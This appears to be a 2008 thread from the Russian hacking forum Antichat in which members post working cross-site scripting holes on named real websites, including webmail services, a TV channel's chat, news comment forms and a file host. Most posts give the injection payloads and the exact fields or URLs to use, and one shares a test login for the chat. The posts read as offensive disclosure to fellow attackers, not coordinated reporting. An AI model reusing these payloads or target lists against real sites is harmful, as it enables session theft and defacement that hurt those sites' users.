HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 11.07.2008, 03:46
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

---------
Жаль, что ток у мну пашет ( -deleted-

Последний раз редактировалось BlackSun; 11.07.2008 в 14:11..
 
Ответить с цитированием

  #222  
Старый 12.07.2008, 15:16
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Цитата:
Сообщение от BlackSun  
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

---------
Жаль, что ток у мну пашет ( -deleted-
пашет!

пример http://r27.vip-file.com:81/download9/12-6c6fdb33afc47e1c2f817a460aa79c40/as.html
 
Ответить с цитированием

  #223  
Старый 13.07.2008, 10:12
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

20minut.ua PR 4
Цитата:
http://20minut.ua/?lang_code=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )

Последний раз редактировалось sabe; 13.07.2008 в 10:15..
 
Ответить с цитированием

  #224  
Старый 17.07.2008, 04:12
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами: 10260776

Репутация: 185
По умолчанию

_http://www.e-xoopport.it/modules/news/

Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)
 
Ответить с цитированием

  #225  
Старый 19.07.2008, 19:10
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

NextMail.ru

Активная ксс, старенькая, но ужось, все еще пашет

Шлем письмо ..
Цитата:
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value='javascript:alert();'></object>
 
Ответить с цитированием

  #226  
Старый 03.08.2008, 12:50
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию

http://novy.tv/services/chat/
Чат "Нового Канала"

Если кто узнает движок, сообщите плз, такой же у прова стоит...

Регаемся, заходим (visto:visto)

Слева, там где Интонация, выбираем "настройка", добавляем свой вариант -
Цитата:
"><script>alert(/Dimi4/)</script>
В меню --- записная книжка --- добавляем запись:

Цитата:
%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2 f%44%69%6d%69%34%2f%29%3c%2f%73%63%72%69%70%74%3e
Ну вообщем может кому пригодится..
и еще фича: если написать в чате сообщение !b blabla !
то текст blabla беоеться в теги
Цитата:
<b> blabla </b>
 
Ответить с цитированием

  #227  
Старый 04.08.2008, 01:14
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

iol.pt
Активная XSS в почте,
Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
Шлем письмо,
Para: - кому,
Assunto: - ксс - <script>alert()</script><noscript>

// BlackSun
 
Ответить с цитированием

  #228  
Старый 04.08.2008, 14:20
Frozzeg
Новичок
Регистрация: 20.07.2008
Сообщений: 5
С нами: 9372801

Репутация: 6
По умолчанию

krasnodar2000.ru

Активная XSS в комментах новостей
Уязвимые поля "Ваше имя", "Город"
 
Ответить с цитированием

  #229  
Старый 04.08.2008, 14:36
Frozzeg
Новичок
Регистрация: 20.07.2008
Сообщений: 5
С нами: 9372801

Репутация: 6
По умолчанию

nevasport.ru


Активная XSS в комментах новостей
Уязвимое поле "Ваше имя"
 
Ответить с цитированием

  #230  
Старый 05.08.2008, 21:15
Frozzeg
Новичок
Регистрация: 20.07.2008
Сообщений: 5
С нами: 9372801

Репутация: 6
По умолчанию

seonews.ru

Активная XSS в комментах новостей
Уязвимое поле "Имя"

Последний раз редактировалось Frozzeg; 05.08.2008 в 21:23..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.